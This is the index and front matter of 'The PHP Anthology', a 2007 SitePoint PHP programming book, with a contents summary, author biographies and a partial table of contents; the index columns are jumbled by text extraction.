                               documenting, 448

   "pretty" URLs, 140
                        REST web services, 429

access
                                    arguments

   to cron utility, 485
                      overriding properties, 21

   files on remote servers, 166–167
       arrays

   to SSH, 484
                               of lines, 86–88

   URLs, 495
                                 reading files as, 149

access control, 269–362
                      strings, 78

   changing passwords, 330–338
            asp_tags, 477

   forgotten passwords, 318–330
           assertions

   HTTP authentication, 271–277
              testing framework, 461

   permission systems, 339–353
            attachments

   private sections of web sites, 283–297
    adding to email messages, 184–186

   registration systems, 297–318
          Auth class, 283

   session classes, 281–282
               authentication

   storing sessions in databases, 353–362
    (see also HTTP authentication)

   using sessions, 277–281
                   defined, 295

AccountMaintenance class, 319, 331
           security, 494

adding
                                    authentication headers, 275

   data in databases, 53–55
               authorization

                                              defined, 296
506

      authorization header, 276              Cache_Lite_Function class, 391
      auto_append_file, 478                  caching, 363–393
      auto_prepend_file, 478                    client-side, 367–371
      auto-commit mode                          examining HTTP headers in web
        default mode, 66                              browsers, 371–372
      autoincrementing field                    file downloads with Internet Explorer,
        determining INSERT's row number,              372–373
              62–63                             function calls, 390–392
                                                output buffering for server-side cach­
      B                                               ing, 373–377
      back-ups                                  parts of pages, 377–381
         database, 69–75                        PEAR::Cache_Lite configuration op­
      bandwidth                                       tions, 385–389
         reading files, 152                     purging Cache_Lite cache, 389–390
      bar graph                                 using PEAR::Cache_Lite for server-
         creating, 224                                side caching, 382–385
      batch jobs                             calendars
         scheduling, 485                        creating, 102–107
      behavioral testing                     call_time_pass_reference, 476
         about, 459                          callbacks
      branches                                  arguments, 353

         revision control software, 438         error handler prototype, 242

      bridge tables                          CAPTCHA (Completely Public Turing
         about, 340                                Test to Tell Computers and Hu­
      browsers (see Internet Explorer; web         mans)
            browsers)                           image verification, 234
      buffering (see output buffering)       CGI mode, 485
      build systems                          change password form
         developing code, 470                   example of, 333
                                             changesets
      C                                         revision control software, 437
      cache files                            characters (see escape characters; wild­
        protecting, 385                            card characters)
      Cache_Lite (see PEAR::Cache_Lite)      charts
      Cache_Lite cache                          displaying, 223–230
        purging, 389–390
507

classes                                     configuration, 473–481

   (see also abstract classes; PEAR; spe­      documentation about, 3

          cific classes)
                      PEAR::Cache_Lite, 385–389

   about, 10
                                  for portable code, 33

   access control for sections of web
         settings, 286

          sites, 283–297
                      storing configuration information in

   repositories of reusable PHP classes,
            files, 163–165

          504
                              configuration files

client-side caching
                           used in access control examples, 270

   controlling, 367–371
                    constructors

code
                                          Auth class, 284

   (see also source code)
                     defined, 14

   coding standards, 446
                      overriding, 22

   deploying, 468–471
                      content
   documenting, 448–453
                       searching for in XML, 409–412

   maintaining multiple versions, 438–
     content-disposition header, 170

          441
                              content-length header, 171

   reuse, 9
                                Content-Type header, 170, 198

   revising old code, 467–468
              control (see access control; error hand­

   testing framework, 454–462
                    ling)

   tracking revisions, 436–438
             COUNT function

   writing distributable code, 441–448
        rows returned from a SELECT call, 60

   writing portable code, 33–38
            credentials

code coverage reports, 463
                    passing in DSN, 44

command line
                               cron utility

   use of, 485, 486
                           access to, 485

communications
                             cross-site request forgery (CSRF)

   security, 495
                              about, 493

composition
                                cross-site scripting (XSS), 83

   about, 25
                                  about, 489–491

compressing
                                   session security, 281

   database data, 174
                      cryptographic storage

   files, 172–174
                             security, 495

concatenation
                              CURRENT_TIMESTAMP function, 108

   strings, 78

Concurrent Versioning System (CVS),

      437
508


      D                                         DATE_FORMAT function, 109
                                                DATE_SUB function, 111
      data
                                                dates and times, 95–113
        compressing in databases, 174
                                                   (see also HTTP dates)
        outputting in table, 127–129, 130–133
                                                   calendars, 102–107
      data grids
                                                   current, 98–99
        customized, 134–139
                                                   date calculations using MySQL, 111–
      data types
                                                         112
        strings, 77
                                                   days of the week, 101
      database connections
                                                   formatting MySQL timestamps, 109–
        setting up, 311
                                                         110
      database servers
                                                   number of days in month, 101–102
        port numbers, 44
                                                   storing dates in MySQL, 107–109
      database transactions
                                                   Unix timestamps, 96–98
        defined, 66
                                                days
      databases, 39–75
                                                   in a month, 101–102
        accessing, 41–44
                                                   of week, 101
        adding or modifying data, 53–55
                                                defaults
        backing-up, 69–75
                                                   error mode, 50
        compressing data, 174
                                                   mode in PDO, 66
        errors in SQL queries, 49–52
                                                deploying
        escape characters, 80
                                                   code, 468–471
        fetching data from tables, 44–49
                                                destructors
        flexible SQL statements, 57–59
                                                   defined, 14
        INSERT's row number using autoincre­
                                                dir pseudo-class, 161
              menting field, 62–63
                                                direct object references
        PDO, 40–41
                                                   security, 491
        permission systems, 339
                                                directories
        rows affected by SQL queries, 59–61
                                                   examining, 160–161
        searching tables, 63–64
                                                DirectoryIterator class, 174
        SQL injection attacks, 55–57
                                                display_errors directive, 240, 261, 477
        storing sessions, 353–362
                                                displaying (see outputting)
        transactions, 65–67
                                                distributed systems
      DatabaseSession class, 354, 361
                                                   revision control software, 437
      date function, 99, 101, 371
                                                docblocks
      DATE_ADD function, 111
                                                   about, 449
      date_default_timezone_set function, 99
509

documentation                              email injection attacks, 193–195
  (see also agile documentation)           encapsulation
  code, 448–453                               about, 13
  for PHP, 2–9                             environmental errors
  test suites as, 453                         defined, 237
DOM                                        environmental PHP errors
  generating XML, 407                         handling as exceptions, 260
DOM functions                              ERRMODE_EXCEPTION, 51
  navigating XML, 405                      ERRMODE_SILENT, 50
DOM XML extension, 397                     ERRMODE_WARNING, 50
downloads                                  error handling, 237–268
  caching files with Internet Explorer,       custom error handlers, 242–247
        372–373                               custom exception class, 252–257
DSN (Data Source Name)                        custom exception handler, 257–260
  about, 43                                   displaying errors and exceptions, 261–
dynamic SQL                                         265
  sprintf function, 59                        E_STRICT constant, 173
dynamic web pages                             error levels reported, 238–240
  caching, 363                                handling as if they were exceptions,
                                                    260–261
E                                             logging and reporting, 247–248
E_ERROR error level, 240                      redirecting to another page, 265–267
E_NOTICE error level, 240                     security, 493
E_STRICT error level, 173, 181, 240, 293      settings, 239–241, 480
E_USER_ERROR error level, 240, 242            SQL queries, 49–52
E_USER_NOTICE error level, 240, 241           triggering errors, 241–242
E_USER_WARNING error level, 240, 242          using exceptions for, 248–252
E_WARNING error level, 240                 error notices
email, 179–196                                JpGraph, 224
  adding attachments, 184–186              error_log, 480
  email injection attacks, 193–195         error_log directive, 241
  generating complex emails, 182–184       error_log function, 263
  groups, 188–191                          error_reporting directive, 239, 477
  incoming email, 191–193                  escape characters
  sending files, 171                          in databases, 80
  sending HTML email, 186–188              exception class, 252–257
  sending simple email, 179–182
510

      exception classes                          fields (see auto-incrementing field; form
        defining, 300                                   fields)
      exception handlers                         file execution attacks, 491
        implementing, 257–260                    file handles
      exception mode                                using, 153–155
        errors in SQL queries, 51                file pointers
      exceptions                                    using, 153
        displaying, 261–265                      file_get_contents function, 150
        handling errors as if they were excep­   file_put_contents function, 156
               tions, 260–261                    files, 147–177
        using for error handling, 248–252           (see also specific files; ZIP utility)
      execution                                     accessing information about local
        settings, 475–479                                  files, 157–159
      EXIF information                              accessing on remote servers, 166–167
        extracting, 217–220                         caching downloads with Internet Ex­
      exif_read_data function, 218                         plorer, 372–373
      Expires header, 371                           creating compressed ZIP/TAR files,
      Expires meta tag, 366                                172–174
      explode function, 86                          examining directories, 160–161
      extension, 481                                FTP, 167–169
      extension_dir, 481                            managing downloads, 170–172
      extensions                                    modifying local files, 155–156
        available from hosting service, 486         outputting source code online, 161–
        documentation about, 5                             163
        XML, 396–398                                reading local files, 148–152
      extracting                                    SPL, 174–177
        files, 173                                  storing configuration information in,
                                                           163–165
      F                                          fonts (see TrueType fonts)
      fatal errors                               form fields
         handling as exceptions, 260                prepopulating, 80
      features                                   formatting
         documentation about, 4                     dates, 96
      fetchObject method                            MySQL timestamps, 109–110
         prepare and execute, 49                    output text, 88–90
                                                    strings, 81–82
511

forms (see HTML forms)
FTP (File Transfer Protocol)
   using, 167–169
function calls
   caching, 390–392
functions
   (see also specific functions)
   file information, 157
fwrite function, 156

G
galleries (see thumbnail galleries)
generating
   (see also sending)
   complex emails, 182–184
GNU Make, 470
graphical watermarks
   displaying, 221
graphs
   displaying, 223–230
grids (see data grids)
groups
   email, 188–191

H
handles (see file handles; file pointers)
header lines
   email injection attacks, 193
headers (see authentication headers; authorization header; Expires header; HTTP headers; request headers; page expiry headers)
help (see documentation)
highlight_file function, 162
highlight_string function, 161
hinting (see type hinting)
hints
   passwords, 319
hosting
   checklist, 483–487
HTML
   meta tags, 365
HTML email
   sending, 186–188
HTML forms
   building, 116–127
HTML tags
   stripping from text, 82–83
HTML_QuickForm class, 117
HTML_QuickForm package, 309, 325
HTML_Table class, 127
HTML_Table_Matrix class, 102
htmlentities function, 80
HTTP authentication
   about, 271–277
HTTP Authentication package, 276
HTTP dates
   calculation of, 371
HTTP headers
   caching, 365
   examining in web browsers, 371–372
   file downloads, 170
   output buffering, 377
HTTP response headers, 278
http.conf file
   hotlinking images, 231

I
ignore_repeated_errors, 480
ignore_repeated_source, 480
imagecopyresampled function, 201
images, 197–236

   charts and graphs, 223–230
   EXIF information, 217–220
   hotlinking, 230–234
   human verification, 234–235
   MIME type, 198–199
   resizing, 202–213
   thumbnail galleries, 214–217
   thumbnails, 199–202
   watermarks, 220–223
implode function, 87
include_path, 478
includes
   settings, 475–479
incoming email
   handling, 191–193
information leakage
   security, 493
inheritance
   about, 17
ini_alter, 474
ini_set, 474
injection flaws, 491
INSERT function
   data into databases, 53
   determining row number with autoincrementing field, 62–63
installation
   documentation about, 3
   PEAR, 498–504
   PHP on Apache web server, 485
   Zend Framework, 395
interfaces
   (see also object interfaces)
   defined, 27
Internet Explorer
   caching file downloads, 372–373
interpolation
   (see also variable interpolation)
   strings, 77
INTERVAL keyword, 111

J
jobs (see batch jobs)
JpGraph library, 223

L
LAMP
   hosting support, 483
levels
   errors, 238–240
LIKE operator
   searching tables, 63
lines
   arrays of, 86–88
Linux
   dates, 97
   hosting support, 483
   session security, 280
listInsertId method
   using, 62
local files
   accessing information about, 157–159
   modifying, 155–156
   reading, 148–152
localhost
   connecting to MySQL databases, 41
log_errors, 241, 480
logging
   errors, 247–248
logic errors
   defined, 238

login
   magic quotes, 288

M
magic methods
   about, 14
magic quotes
   checking for, 37
magic_quotes_gpc, 288, 476
mail function, 180
Mail_mime package, 309, 325
max_execution_time, 478
MD5 algorithm
   passwords, 286
   security, 495
member variables (see properties)
memory_limit, 479
meta tags
   caching, 365
methods
   (see also abstract methods; magic methods; static methods)
   about, 11
   overriding, 20
Microsoft Windows (see Windows)
MIME type
   specifying, 198–199
mktime function, 97
mod_rewrite
   "pretty" URLs, 141
   hotlinking images, 231
modes (see exception mode; silent mode; warning mode)
modifying
   data in databases, 53–55
   local files, 155–156
multi-processing module (MPM)
   hosting support, 484
MultiViews
   "pretty" URLs, 140
MyISAM engine
   performance, 361
MySQL
   calculating dates, 111–112
   MyISAM engine performance, 361
   stored procedure example, 68–69
   storing dates, 107–109
MySQL databases
   connecting to on localhost, 41
MySQL timestamps
   formatting, 109–110
mysql_real_escape_string function, 80
MySQLDump class
   operating system configuration, 70
   using, 72

N
namespaces
   choosing, 445
   defined, 413
nodes
   searching for in XML, 409–412
non-distributed systems
   revision control software, 437
“notice” error messages, 186
NOW function, 108

O
object interfaces
   about, 29
object oriented programming (OOP)
   about, 9–33

   using, 442
object type hinting, 249
objects
   creating, 14
   treating as strings, 16
open source
   revision control software, 437
Open Web Application Security Project (OWASP), 489
open_basedir, 477
operating systems
   MySQLDump class, 70
output buffering
   caching parts of pages, 378
   displaying errors and exceptions, 261
   server-side caching, 373–377
outputting
   charts and graphs, 223–230
   data in table, 127–129, 130–133
   errors and exceptions, 261–265
   formatted text, 88–90
   source code online, 161–163
   strings, 79–81
overloading
   servers, 484
overriding
   constructors, 22
   methods and properties, 20

P
packet sniffers
   data security, 270
page expiry headers
   setting, 367
pages
   caching parts of, 377–381
   preventing web browsers from caching, 365–367
parsing
   RSS feeds, 398–405
   XML with XMLReader, 399
passing
   credentials in DSN, 44
passwords
   changing, 330–338
   forgotten, 318–330
   MD5 algorithm, 286
   security, 494
PDO (PHP Data Object)
   about, 40–41
   auto-commit mode, 66
PEAR, 497–504
   alternatives to, 504
   installing, 498–504
PEAR Coding Standards, 446
PEAR package manager, 501–503
PEAR packages
   PHP 5 E_STRICT compliance, 293
PEAR::Cache_Lite
   configuration options, 385–389
   server-side caching, 382–385
PEAR::HTML_QuickForm package, 297
PEAR::Mail class, 182
PEAR::Mail package, 180
PEAR::Mail_Mime class, 182, 184, 186, 188, 297
PEAR::Net_FTP class, 168
PEAR::Validate class, 90
performance
   MyISAM engine, 361
permissions
   files on Unix-based Web servers, 156

permissions systems
   building, 339–353
Phing, 470
php.ini file
   configuration, 473
   date.timezone setting, 99
   error handling settings, 242
   error logging settings, 247
   safe_mode, 486
phpDocumentor, 449
phpinfo function, 485
phpt testing framework, 456, 460
PHPUnit, 456, 461
pie charts
   creating, 227
placeholders
   date function, 100
pointers (see file pointers)
polymorphism
   about, 27
port numbers
   database servers, 44
portability
   settings, 475–477
post_max_size, 479
prepare and execute methods
   PDO database access, 46
   SQL injection attack, 55
prepopulating
   form fields, 80
preserve state, 277
"pretty" URLs, 139–145
printf function, 89
printing (see outputting)
private implementation
   defined, 13
programming errors
   defined, 237
properties
   (see also static properties)
   about, 11
   overriding, 20
protected visibility
   defined, 13
protecting
   cache files, 385
prototypes
   error handlers, 242
proxy servers
   caching, 366
public interfaces (see APIs)
public visibility
   defined, 13
purging
   Cache_Lite cache, 389–390

Q
Query method
   PDO database access, 45

R
read function, 356
readCache function, 378
readdir function, 160
readfile function, 152, 170
reading
   local files, 148–152
realm
   HTTP authentication, 276
redirecting
   to another page, 265–267

refactoring
   about, 467
register_globals, 36, 476
registration forms
   example of, 317
registration systems
   building, 297–318
relational databases
   PHP support for, 39
remote servers
   accessing files on, 166–167
replace operations
   advanced, 84–86
report_memleaks, 480
reporting
   (see also error handling)
   errors, 247–248
repositories
   layout, 438
   reusable PHP classes, 504
request headers, 368
resellers
   hosting services, 484
reserved words, 341
resetting
   passwords, 325
resizing
   images, 202–213
REST web services
   consuming, 425–431
   serving, 431–433
revision control software (RCS)
   about, 436–438
RSS feeds
   generating, 405–409
   parsing, 398–405
rules (see validation rules)

S
safe_mode, 486
SAX
   parsing RSS feeds, 404
   XML extension, 397
scalar
   strings, 77
scheduling
   batch jobs, 485
screening
   web site visitors, 297
scripts (see stored procedures)
   handling incoming email, 191
   hosting policy, 485
search operations
   advanced, 84–86
searching
   for nodes or content in XML, 409–412
   tables, 63–64
security, 489–496
   data transmission, 269
   documentation about, 4
   email injection attacks, 193–195
   files, 148, 156, 165
   hiding code, 163
   sessions, 280
   settings, 475–477
SELECT call
   number of rows returned, 60
sending
   (see also generating)
   email to groups, 188–191
   HTML email, 186–188
   simple email, 179–182

servers
   (see also Apache web server; database servers; proxy servers; remote servers; web servers)
   displaying errors, 261
   overloading, 484
   session files, 280
   swapping, 279
server-side caching
   output buffering, 373–377
   using PEAR::Cache_Lite for, 382–385
services (see web services; XML)
session class, 281–282
session management
   security, 494
session.save_path, 481
session.use_cookies, 481
session_regenerate_id function, 494
sessions
   storing, 279
   using, 231, 277–281
set_error_handler function, 243, 257, 260
set_exception_handler function, 257
settingAllowOverride, 486
settings, 475–481
   configuration, 286
   error handling, 239–241, 242, 480
   includes and execution, 475–479
   miscellaneous, 481
   security and portability, 475–477
short_open_tag, 476
SignUp class, 299
signup page
   creating, 308
silent mode
   errors in SQL queries, 50
SimpleTest, 456, 461
SimpleXML
   parsing RSS feeds, 398
   REST web services, 426
   XML extension, 397
SOAP web services
   consuming, 420–422
   serving, 423–425
SOAP XML extension, 398
SoapClient class, 421
source code
   outputting online, 161–163
spam legislation
   about, 190
SPL (Standard PHP Library)
   using, 174–177
sprintf function, 89
   dynamic SQL, 59
SQL, 44–61
   adding or modifying data in databases, 53–55
   errors, 49–52
   fetching data from tables, 44–49
   flexible SQL statements, 57–59
   rows affected by a query, 59–61
   stored procedures, 67–69
SQL injection attacks
   about, 491
   prepare and execute methods, 55
   protecting from, 55–57
SSH
   access to, 484
SSL
   security, 495
standards
   coding, 446
static methods
   about, 31

   validating strings, 90
static properties
   about, 31
stored procedures
   cross-site scripting security exploit, 83
   using with PDO, 67–69
storing
   configuration information in files, 163–165
   cryptographic data, 495
   dates in MySQL, 107–109
   sessions elsewhere from server, 279
   sessions in databases, 353–362
str_replace function, 85
streams
   accessing files, 166
string functions
   using XML extension instead of, 396–398
strings, 77–94
   breaking up text into arrays of lines, 86–88
   formatting, 81–82
   outputting formatted text, 88–90
   outputting safely, 79–81
   reading files as, 150
   search and replace, 84–86
   stripping HTML tags from text, 82–83
   treating objects as, 16
   trimming white space, 88
   validating submitted data, 90–94
   wrapping text, 84
strip_quotes.php file, 91
stripping
   HTML tags from text, 82–83
strtotime function, 101, 102
Structures_DataGrid class, 134
Subversion (SVN), 436, 437
swapping
   servers, 279
symlinks
   deploying code, 468
syntax errors
   defined, 237

T
tables
   fetching data, 44–49
   outputting data, 127–129, 130–133
   searching, 63–64
tags
   deploying code, 468
   revision control software, 438
TAR files
   creating, 172–174
template caching
   about, 376
ternary operators
   reading files as arrays, 149
Test Driven Development (TDD)
   defined, 462
test environments, 461
test pages
   permission systems, 349
test suites
   as documentation, 453
testing
   code coverage, 463–467
text
   arrays of lines, 86–88
   outputting, 88–90
   trimming white space, 88
   wrapping, 84

text watermarks
   displaying, 220
threaded multi-processing module (MPM)
   hosting support, 484
thumbnail galleries
   creating, 214–217
thumbnail images
   creating, 199–202
times (see dates and times)
timestamps (see MySQL timestamps; Unix timestamps)
tracking
   code revisions, 436–438
transactions
   databases, 65–67
trigger_error function, 241
triggering
   errors, 241–242
trimming
   white space from text, 88
TrueType fonts
   JpGraph, 225
type hinting
   about, 25
types
   data, 77

U
Unix
   session security, 280
Unix timestamps
   using, 96–98
UPDATE function
   data into databases, 54
upgrades
   hosting service policy, 486
uptime command, 484
URLs
   "pretty", 139–145
   access, 495
   direct object reference attacks, 491
User class, 343
utilities (see cron utility; ZIP utility)

V
validation rules
   forms, 120
variable interpolation
   strings, 77
variables
   constructing SQL statements, 57
verification
   of images by humans, 234
versions
   multiple code, 438–441
visibility
   defined, 13

W
warning mode
   errors in SQL queries, 50
watermarks
   adding to images, 220–223
web browsers
   (see also Internet Explorer)
   examining HTTP headers, 371–372
   preventing from caching pages, 365–367
web hosting (see hosting)
web pages (see pages)
web servers
   (see also Apache web server)

   caching, 364
   preventing web browsers from caching pages, 365–367
web services, 412–434
   (see also XML)
   consuming REST, 425–431
   consuming SOAP, 420–422
   consuming XML-RPC services, 412–416
   serving REST, 431–433
   serving SOAP, 423–425
   serving XML-RPC, 416–420
week
   day of, 101
WHERE clause
   UPDATE and DELETE SQL commands, 61
whitespace
   trimming, 88
wildcard characters
   about, 64
Windows
   dates, 97
   MySQLDump class, 72
wordwrap function, 84
wrapper class, 281
wrapping
   text, 84
write function, 357
writeCache function, 378
WSDL
   SOAP web services, 421, 424

X
XDebug, 463
XML, 395–412
   extensions, 396–398
   generating RSS feeds, 405–409
   parsing RSS feeds, 398–405
   REST web services, 426
   searching for nodes or content, 409–412
XMLReader
   parsing XML, 399
XMLReader class, 397
XML-RPC web services
   consuming, 412–416
   serving, 416–420
XML-RPC XML extension, 398
xmlrpc_encode_request function, 414
XMLWriter class, 397
   generating XML, 408
XPath
   searching XML, 410
XPath XML extension, 397
XSL XML extension, 397
XSS (see cross-site scripting)

Z
Zend Framework
   coding standards, 447
   installing, 395
   REST web service, 430
   XML-RPC, 413
Zend_Feed class
   SimpleXML, 403
Zend_XmlRpc_Server class, 416, 419
ZIP utility
   backing up databases, 71
   creating files, 172–174





The PHP Anthology

  • 2. Summary of Contents
    Preface . . . . . . . . . . xv
    1. Introduction . . . . . . . . . . 1
    2. Using Databases with PDO . . . . . . . . . . 39
    3. Strings . . . . . . . . . . 77
    4. Dates and Times . . . . . . . . . . 95
    5. Forms, Tables, and Pretty URLs . . . . . . . . . . 115
    6. Working with Files . . . . . . . . . . 147
    7. Email . . . . . . . . . . 179
    8. Images . . . . . . . . . . 197
    9. Error Handling . . . . . . . . . . 237
    10. Access Control . . . . . . . . . . 269
    11. Caching . . . . . . . . . . 363
    12. XML and Web Services . . . . . . . . . . 395
    13. Best Practices . . . . . . . . . . 435
    A. PHP Configuration . . . . . . . . . . 473
    B. Hosting Provider Checklist . . . . . . . . . . 483
    C. Security Checklist . . . . . . . . . . 489
    D. Working with PEAR . . . . . . . . . . 497
    Index . . . . . . . . . . 505
  • 3. THE PHP ANTHOLOGY: 101 ESSENTIAL TIPS, TRICKS & HACKS
    BY DAVEY SHAFIK, MATTHEW WEIER O’PHINNEY, LIGAYA TURMELLE, HARRY FUECKS, AND BEN BALBO
    2ND EDITION
  • 4. The PHP Anthology: 101 Essential Tips, Tricks & Hacks
    by Davey Shafik, Matthew Weier O’Phinney, Ligaya Turmelle, Harry Fuecks, and Ben Balbo

    Copyright © 2007 SitePoint Pty. Ltd.

    Expert Reviewer: Jason Sweat
    Editor: Georgina Laidlaw
    Managing Editor: Simon Mackie
    Editor: Hilary Reynolds
    Technical Editor: Andrew Tetlaw
    Index Editor: Fred Brown
    Technical Director: Kevin Yank
    Cover Design: Alex Walker

    Printing History:
    First Edition: December, 2003
    Second Edition: October, 2007

    Notice of Rights
    All rights reserved. No part of this book may be reproduced, stored in a retrieval system or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

    Notice of Liability
    The author and publisher have made every effort to ensure the accuracy of the information herein. However, the information contained in this book is sold without warranty, either express or implied. Neither the authors and SitePoint Pty. Ltd., nor its dealers or distributors will be held liable for any damages to be caused either directly or indirectly by the instructions contained in this book, or by the software or hardware products described herein.

    Trademark Notice
    Rather than indicating every occurrence of a trademarked name as such, this book uses the names only in an editorial fashion and to the benefit of the trademark owner with no intention of infringement of the trademark.

    Published by SitePoint Pty. Ltd.
    424 Smith Street Collingwood
    VIC Australia 3066
    Web: www.sitepoint.com
    Email: business@sitepoint.com

    ISBN 978-0-9758419-9-0
    Printed and bound in the United States of America
  • 5. Ben Balbo
    Ben Balbo was born in Germany, grew up in the UK, lives in Melbourne, and likes Guinness. While he isn’t drinking Guinness (which is most of the time in Melbourne, as it just doesn’t taste the same), he earns a living as a PHP developer and trainer, security consultant, and Open Source developer. He has been known to talk in public about web development-related topics, which comes as part of the package of being on the committees of both the Melbourne PHP User Group and Open Source Developers’ Club. Although he wouldn’t admit this, he participates at this level only in order to go to restaurants or pubs after the meetings.

    Harry Fuecks
    Harry Fuecks [1] is a technical writer, programmer, and system engineer. He has worked in corporate IT since 1994, having completed a Bachelor’s degree in Physics. He first came across PHP in 1999, while putting together a small intranet. Today, he’s the lead developer of a corporate extranet, where PHP plays an important role in delivering a unified platform for numerous back office systems. In his off hours he writes technical articles for SitePoint and runs phpPatterns, [2] a site exploring PHP application design. Originally from the United Kingdom, he now lives in Switzerland. Harry is the proud father of a beautiful baby girl who keeps him busy all day (and night!).

    Davey Shafik
    Davey Shafik is a full-time PHP developer with ten years’ experience in PHP and related technologies. An avid magazine writer, book author, and speaker, Davey keeps his mind sharp by trying to tackle problems from a unique perspective from his home in Central Florida where he lives with five cats and more computers.

    Ligaya Turmelle
    Ligaya Turmelle is a full-time goddess, occasional PHP programmer, and obsessive world traveler. Actively involved with the PHP community as a founding Principal of phpwomen.org, administrator at codewalkers.com, roving reporter for the Developer Zone on Zend.com, and PHP blogger and long-time busybody of #phpc on freenode, she hopes to one day actually meet the people she talks to. When not sitting at her computer staring at the screen, Ligaya can usually be found either playing golf, scuba diving, snorkeling, kayaking, hiking, or just playing with the dogs outside. Ligaya Turmelle is a Zend Certified Engineer.

    [1] Harry Fuecks photo credit: Bruno Gerber http://www.flickr.com/photos/beegee74/231137320/
    [2] http://www.phppatterns.com/
  • 6. Matthew Weier O’Phinney
Matthew Weier O’Phinney is a full-time father of two and spends his free time developing in PHP. He is a PEAR developer, core contributor to Zend Framework, and all-around PHP 5 proponent, though PHP 6 cannot come soon enough for him.

About the Expert Reviewer
Jason Sweat has used PHP since 2001, when he was searching for a free (as in beer) substitute for IIS/ASP to create an accounting system for a home business. His Unix administrator pointed him towards Linux, Apache, and PHP. He has since adopted PHP as an intranet development standard at work, as well as using PHP in a Unix shell scripting environment. He is the author of php|architect's Guide to PHP Design Patterns (Toronto: Marco Tabini & Associates, 2005), was a co-author of PHP Graphics Handbook (Birmingham: Wrox 2003), has published several articles for the Zend web site and for php|architect magazine, and has presented numerous talks on PHP at various conferences. Jason is a Zend Certified Engineer, and maintains a blog at http://blog.casey-sweat.us/.

About the Technical Editor
Andrew Tetlaw has been tinkering with web sites as a web developer since 1997 and has also worked as a high school English teacher, an English teacher in Japan, a window cleaner, a car washer, a kitchen hand, and a furniture salesman. At SitePoint he is dedicated to making the world a better place through the technical editing of SitePoint books and kits. He is also a busy father of five, enjoys coffee, and often neglects his blog at http://tetlaw.id.au/.

About the Technical Director
As Technical Director for SitePoint, Kevin Yank oversees all of its technical publications: books, articles, newsletters, and blogs. He has written over 50 articles for SitePoint, but is best known for his book, Build Your Own Database Driven Website Using PHP & MySQL. Kevin lives in Melbourne, Australia, and enjoys performing improvised comedy theatre and flying light aircraft.

About SitePoint
SitePoint specializes in publishing fun, practical, and easy-to-understand content for web professionals. Visit http://www.sitepoint.com/ to access our books, newsletters, articles, and community forums.
  • 7. Table of Contents
Preface
    Who Should Read this Book?
    What’s Covered in this Book?
    Running the Code Examples
    The Book’s Web Site
    The SitePoint Forums
    The SitePoint Newsletters
    Your Feedback
    Conventions Used in this Book
Chapter 1 Introduction
    Where do I get help?
    What is OOP?
    How do I write portable PHP code?
    Summary
Chapter 2 Using Databases with PDO
    What is PDO?
    How do I access a database?
    How do I fetch data from a table?
    How do I resolve errors in my SQL queries?
    How do I add data to, or modify data in, my database?
    How do I protect my web site from an SQL injection attack?
    How do I create flexible SQL statements?
    How do I find out how many rows I’ve touched?
  • 8. How do I find out a new INSERT’s row number in an autoincrementing field?
    How do I search my table?
    How do I work with transactions?
    How do I use stored procedures with PDO?
    How do I back up my database?
    Summary
Chapter 3 Strings
    How do I output strings safely?
    How do I preserve formatting?
    How do I strip HTML tags from text?
    How do I force text to wrap after a certain number of characters?
    How do I perform advanced search and replace operations?
    How do I break up text into an array of lines?
    How do I trim whitespace from text?
    How do I output formatted text?
    How do I validate submitted data?
    Summary
Chapter 4 Dates and Times
    How do I use Unix timestamps?
    How do I obtain the current date?
    How do I find a day of the week?
    How do I find the number of days in a month?
    How do I create a calendar?
    How do I store dates in MySQL?
    How do I format MySQL timestamps?
    How do I perform date calculations using MySQL?
    Summary
  • 9. Chapter 5 Forms, Tables, and Pretty URLs
    How do I build HTML forms with PHP?
    How do I display data in a table?
    How do I display data in a sortable table?
    How do I create a customized data grid?
    How do I make “pretty” URLs in PHP?
    Summary
Chapter 6 Working with Files
    How do I read a local file?
    How do I use file handles?
    How do I modify a local file?
    How do I access information about a local file?
    How do I examine directories with PHP?
    How do I display PHP source code online?
    How do I store configuration information in a file?
    How do I access a file on a remote server?
    How do I use FTP from PHP?
    How do I manage file downloads with PHP?
    How do I create compressed ZIP/TAR files with PHP?
    How do I work with files using the Standard PHP Library in PHP 5?
    Summary
Chapter 7 Email
    How do I send a simple email?
    How do I simplify the generation of complex emails?
    How do I add attachments to messages?
    How do I send HTML email?
  • 10. How do I mail a message to a group of people?
    How do I handle incoming mail with PHP?
    How can I protect my site against email injection attacks?
    Summary
Chapter 8 Images
    How do I specify the correct image MIME type?
    How do I create thumbnail images?
    How do I resize images without stretching them?
    How can I put together a simple thumbnail gallery?
    How do I extract EXIF information from images?
    How do I add a watermark to an image?
    How do I display charts and graphs with PHP?
    How do I prevent the hotlinking of images?
    How do I create images that can be verified by humans only?
    Summary
Chapter 9 Error Handling
    What error levels does PHP report?
    What built-in settings does PHP offer for error handling?
    How can I trigger PHP errors?
    How do I implement a custom error handler with PHP?
    How do I log and report errors?
    How can I use PHP exceptions for error handling?
    How do I create a custom Exception class?
    How do I implement a custom exception handler with PHP?
    How can I handle PHP errors as if they were exceptions?
    How do I display errors and exceptions gracefully?
    How do I redirect users to another page following an error condition?
  • 11. Summary
Chapter 10 Access Control
    How do I use HTTP authentication?
    How do I use sessions?
    How do I create a session class?
    How do I create a class to control access to a section of the site?
    How do I build a registration system?
    How do I deal with members who forget their passwords?
    How do I let users change their passwords?
    How do I build a permissions system?
    How do I store sessions in a database?
    Summary
Chapter 11 Caching
    How do I prevent web browsers from caching a page?
    How do I control client-side caching?
    How do I examine HTTP headers in my browser?
    How do I cache file downloads with Internet Explorer?
    How do I use output buffering for server-side caching?
    How do I cache just the parts of a page that change infrequently?
    How do I use PEAR::Cache_Lite for server-side caching?
    What configuration options does Cache_Lite support?
    How do I purge the Cache_Lite cache?
    How do I cache function calls?
    Summary
Chapter 12 XML and Web Services
    Which XML technologies are available in PHP 5?
  • 12. Why should I use PHP’s XML extensions instead of PHP string functions?
    How do I parse an RSS feed?
    How do I generate an RSS feed?
    How do I search for a node or content in XML?
    How can I consume XML-RPC web services?
    How do I serve my own XML-RPC web services?
    How can I consume SOAP web services?
    How do I serve SOAP web services?
    How can I consume REST services?
    How can I serve REST services?
    Summary
Chapter 13 Best Practices
    How do I track revisions to my project’s code?
    How can I maintain multiple versions of a single codebase?
    How can I write distributable code?
    How can I document my code for later reference by myself or others?
    How can I ensure future changes to my code won’t break current functionality?
    How can I determine what remains to be tested?
    I’ve reviewed some of my old code, and it’s horrible. How can I make it better?
    How can I deploy code safely?
    Summary
Appendix A PHP Configuration
    Configuration Mechanisms
    Key Security and Portability Settings
  • 13. Includes and Execution Settings
    Error-related Settings
    Miscellaneous Settings
